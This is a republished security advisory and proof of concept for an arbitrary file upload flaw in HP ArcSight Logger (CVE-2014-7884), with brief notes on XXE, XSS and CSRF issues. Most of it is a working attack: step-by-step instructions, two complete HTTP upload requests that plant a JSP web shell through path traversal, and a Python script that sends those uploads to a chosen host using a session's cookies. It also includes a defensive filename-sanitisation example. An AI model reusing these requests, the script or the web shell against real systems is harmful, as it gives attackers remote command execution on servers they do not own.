ArcSight upload poc

Source: Internet | Editor: 程序博客网 | Time: 2024/06/07 10:20

This Tuesday the CERT Coordination Center at Carnegie Mellon University published an advisory: Polish security researcher Julian Horoszkiewicz has found five security vulnerabilities in HP's ArcSight product line.

Vulnerability 1: arbitrary file upload

An authenticated attacker can exploit a flaw in ArcSight Logger to upload arbitrary files to the victim system remotely, which lets them run malicious scripts on the server with the application's privileges. The product's configuration import feature does not sanitize the uploaded file name, which is what makes the arbitrary upload possible.

Vulnerability 2: content tampering

An authenticated attacker can tamper with system resources and parsers. The problem exists because Logger lets every user reach certain configuration features, such as Inputs, Search and Content Management, and an attacker holding any account is one of those users.

Vulnerability 3: XML external entity injection

Horoszkiewicz also found that the XML parser behind Logger's content import is vulnerable to XML external entity (XXE) injection, which an attacker could use to run arbitrary scripts on the victim's server.

The remaining vulnerabilities in HP ArcSight products are of two kinds: cross-site scripting (XSS) and cross-site request forgery (CSRF). XSS can be used to corrupt or modify system rules and resources, and CSRF to tamper with data on the system. In both cases the attacker has to trick the victim into visiting a crafted malicious link, and the damage done depends on the victim's privileges.

Affected products

ArcSight Enterprise Security Manager (ESM): all versions before 6.8c
ArcSight Logger: all versions before 6.0p1

POC



# Exploit Title: ArcSight Logger - Arbitrary File Upload (Code Execution)
# Date: 13.03.2015
# Exploit Author: Julian Horoszkiewicz
# Vendor Homepage: www.hp.com
# Software Link: http://www8.hp.com/us/en/software-solutions/arcsight-logger-log-management/try-now.html
# Version: ArcSight Logger 5.3.1.6838.0 and prior versions
# Tested on: Red Hat Linux
# CVE: CVE-2014-7884
 
[ Description ]
The configuration import file upload capability does not fully sanitize file names, which allows attackers to put executable files into the document root. The PoC uploads a server-side (JSP) script with a shell-execution function in order to gain remote OS command execution. To reach the vulnerable feature the user has to be authenticated to the console; the feature is available to all authenticated users, including non-administrative ones and those holding only the read-only admin role. Shell commands run with the default NPA privileges (the arcsight user), which still gives full control over the service (for instance, /etc/init.d/arcsight_logger stop was performed successfully).
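As an added illustration (not ArcSight's code, which is Java, and not the advisory author's), the following Python models the file-name handling the description above blames: joining the client-supplied multipart filename under the /opt/arcsight/current/backups upload directory and letting the filesystem resolve the `..` components, beside a hardened version that accepts nothing but a plain basename and re-checks containment. The directory paths and the two PoC filenames come from this advisory; the basename character allow-list is an assumption.

```python
"""Added example (not ArcSight or advisory code): why both PoC filenames must be rejected."""
import posixpath
import re
from pathlib import PurePosixPath

# Paths quoted in the advisory: the upload directory and Logger's Tomcat document root.
UPLOAD_DIR = PurePosixPath("/opt/arcsight/current/backups")
DOCROOT = PurePosixPath("/opt/arcsight/current/local/tomcat/webapps/logger")

# The two Content-Disposition filename values used by the PoC.
POC_FIRST = "some_new_dir/hellcode.jsp"
POC_SECOND = "some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"

# Assumption: what a single basename may look like (the advisory specifies no charset).
SAFE_BASENAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")


def is_within(path: PurePosixPath, base: PurePosixPath) -> bool:
    """True if path is base itself or lies below it (lexical check on normalised paths)."""
    try:
        path.relative_to(base)
        return True
    except ValueError:
        return False


def naive_target(client_name: str, upload_dir: PurePosixPath = UPLOAD_DIR) -> PurePosixPath:
    """The vulnerable behaviour the advisory describes: join the client-supplied
    name under the upload directory and let '..' resolve, with no containment check.
    Filesystem resolution is modelled here with posixpath.normpath."""
    return PurePosixPath(posixpath.normpath(str(upload_dir / client_name)))


def safe_target(client_name: str, upload_dir: PurePosixPath = UPLOAD_DIR) -> PurePosixPath:
    """Hardened handler: a multipart filename is only ever a basename. Reject any
    separator, NUL byte or dot-only name, then re-check containment after
    normalisation as defence in depth."""
    if not client_name or "\x00" in client_name:
        raise ValueError("empty filename or NUL byte")
    if "/" in client_name or "\\" in client_name:
        raise ValueError(f"path separator in upload filename: {client_name!r}")
    if client_name in (".", "..") or not SAFE_BASENAME.fullmatch(client_name):
        raise ValueError(f"unexpected characters in upload filename: {client_name!r}")
    target = PurePosixPath(posixpath.normpath(str(upload_dir / client_name)))
    if target == upload_dir or not is_within(target, upload_dir):
        raise ValueError(f"upload would escape {upload_dir}: {target}")
    return target


def classify(client_name: str) -> dict:
    """Summarise what one filename does under the vulnerable and hardened handlers."""
    naive = naive_target(client_name)
    try:
        hardened = str(safe_target(client_name))
    except ValueError as exc:
        hardened = f"rejected ({exc})"
    return {
        "name": client_name,
        "naive_path": str(naive),
        "stays_in_upload_dir": is_within(naive, UPLOAD_DIR),
        "lands_in_docroot": is_within(naive, DOCROOT),
        "hardened": hardened,
    }


if __name__ == "__main__":
    for name in (POC_FIRST, POC_SECOND, "config.xml.gz"):
        print(classify(name))
```

Run stand-alone it shows that the first PoC name stays inside the upload directory (which is why the application accepted it and created the subdirectory), that the second resolves to the Logger document root, and that the hardened handler rejects both while still accepting an ordinary `config.xml.gz`.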
 
 
[ Proof of Concept ]
Note: to reproduce the attack for the first time, two requests are required.
The first request creates a subdirectory in the /opt/arcsight/current/backups upload directory (the application creates the directory named in the file name).
The second puts the actual JSP web shell into the document root, using path traversal relative to that newly created subdirectory.
Other direct manipulations of the file name aimed at uploading into the document root did not succeed during testing (references to the upload directory without a subdirectory were refused by the application).
The only difference required between the two requests to land the upload in the desired location is the filename property of the Content-Disposition header.
 
The general rule is as follows:
First request (creates the /opt/arcsight/current/backups/some_new_dir directory; the uploaded file content is irrelevant):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/whatever"
Second request (uploads the file to the location of choice by referring to that subdirectory with path traversal):
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
 
Note also that valid tokens (asf_token, session_string, JSESSIONID) are required.
The most efficient way to reproduce this is:
1) give the local JSP web shell file a .xml.gz extension (any name will do)
2) import it in the Configuration->Content Management->Import section through the web browser
3) intercept the browser traffic with a local proxy (Burp Suite, for instance)
4) change the filename property in the Content-Disposition header so that it contains the name of a new subdirectory, and forward the request
5) send another copy of the same request, this time with a filename that refers to the subdirectory created by the previous request and uses path traversal to point into the Logger document root; this uploads the web shell
6) navigate the browser to http://victim.com:9000/logger/hellcode.jsp
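The two captured requests reproduced below differ only in the multipart filename. As an added example, not part of the original advisory, here is a standard-library Python script that builds and sends those requests so the difference is explicit. The endpoint, form field names, boundary layout and web-shell path are taken from the PoC; the Cookie header and asf_token are placeholders that must be copied from your own authenticated browser session (the script does not log in), and the self-signed certificate assumption is mine.

```python
"""Added example (not the advisory author's code): build and send the two
upload requests described in the PoC. Only the multipart 'filename' differs."""
import http.client
import ssl
import sys
import uuid

# Endpoint, form field names and web-shell location, all as quoted in the PoC.
UPLOAD_PATH = "/logger/import_content_config_upload.ftl?"
FILE_FIELD = "field-importFile"
SUBDIR = "some_new_dir"
SHELL_NAME = "hellcode.jsp"


def exploit_filenames(subdir=SUBDIR, shell=SHELL_NAME):
    """Return (first, second) filename values. The first makes the application
    create <upload dir>/<subdir>; the second traverses out of that subdirectory
    into the Logger document root."""
    return (
        f"{subdir}/{shell}",
        f"{subdir}/../../local/tomcat/webapps/logger/{shell}",
    )


def build_multipart(boundary, asf_token, filename, payload):
    """Reproduce the four form parts of the captured request, in the same order."""
    crlf = b"\r\n"
    parts = [
        (b'form-data; name="uploadid"', None, b""),
        (b'form-data; name="update"', None, b"true"),
        (b'form-data; name="asf_token"', None, asf_token.encode()),
        (
            f'form-data; name="{FILE_FIELD}"; filename="{filename}"'.encode(),
            b"application/x-gzip",  # what the browser sent for the .xml.gz decoy name
            payload,
        ),
    ]
    out = bytearray()
    for disposition, ctype, data in parts:
        out += b"--" + boundary.encode() + crlf
        out += b"Content-Disposition: " + disposition + crlf
        if ctype:
            out += b"Content-Type: " + ctype + crlf
        out += crlf + data + crlf
    out += b"--" + boundary.encode() + b"--" + crlf
    return bytes(out)


def upload(host, port, cookie, asf_token, filename, payload, boundary=None):
    """POST one upload over HTTPS and return the HTTP status code.
    'cookie' is the complete Cookie header (JSESSIONID, session_string, ...)
    copied from a valid authenticated session; this script does not log in.
    Assumption: the appliance uses a self-signed certificate, so verification
    is disabled here."""
    boundary = boundary or "----PoCBoundary" + uuid.uuid4().hex
    body = build_multipart(boundary, asf_token, filename, payload)
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, context=ctx)
    conn.request("POST", UPLOAD_PATH, body=body, headers={
        "Cookie": cookie,
        "Referer": f"https://{host}:{port}{UPLOAD_PATH}",
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    })
    status = conn.getresponse().status
    conn.close()
    return status


if __name__ == "__main__":
    # usage: python poc.py <host> <port> '<Cookie header>' <asf_token> <webshell.jsp>
    host, port, cookie, token, shell_path = sys.argv[1:6]
    with open(shell_path, "rb") as fh:
        payload = fh.read()
    for fname in exploit_filenames():
        print(fname, "->", upload(host, int(port), cookie, token, fname, payload))
    print(f"web shell should now answer at /logger/{SHELL_NAME}?cmd=id")
```

The same web shell body is sent twice, exactly as in the advisory: the first response only matters for the side effect of creating the subdirectory, and the second request is the one that writes into the Tomcat webapp.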
 
Full requests:
 
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
 
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
 
 
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
 
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
 
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/hellcode.jsp"
Content-Type: application/x-gzip
 
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
 
-----------------------------17152166115305--
 
 
 
 
 
 
 
POST /logger/import_content_config_upload.ftl? HTTP/1.1
Host: victim.com:9000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://victim.com:9000/logger/import_content_config_upload.ftl?
Cookie: com.arcsight.product.platform.logger.client.session.SessionContext.productName=Logger; com.arcsight.product.platform.logger.client.session.SessionContext.arcsightProductName=ArcSight%20Logger; JSESSIONID=F89541D136E58EFD4B2377313B56B594; user_id_seq=7; session_string=TjF-x1fSWrKb3_tC0mYf7bQ3tVMaoD6kjmBItnWftsk.
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17152166115305
Content-Length: 1565
 
-----------------------------17152166115305
Content-Disposition: form-data; name="uploadid"
 
 
-----------------------------17152166115305
Content-Disposition: form-data; name="update"
 
true
-----------------------------17152166115305
Content-Disposition: form-data; name="asf_token"
 
7caea3f1-7bfb-4419-a4bb-4a19e3800bff
-----------------------------17152166115305
Content-Disposition: form-data; name="field-importFile"; filename="some_new_dir/../../local/tomcat/webapps/logger/hellcode.jsp"
Content-Type: application/x-gzip
 
<%@ page import="java.util.*,java.io.*"%>
<HTML>
<TITLE>Laudanum JSP Shell</TITLE>
<BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send"><br/>
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
<hr/>
<address>
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</BODY></HTML>
 
-----------------------------17152166115305--
 
 
 
[ Time line ]
28.08.2014 - vulnerability report sent to HP
21.01.2015 - new version containing the fix released by HP
12.03.2015 - security bulletin published (CVE-2014-7884)
 
 
[ Credits ]
Julian Horoszkiewicz - IT Security Specialist @ ING Services Polska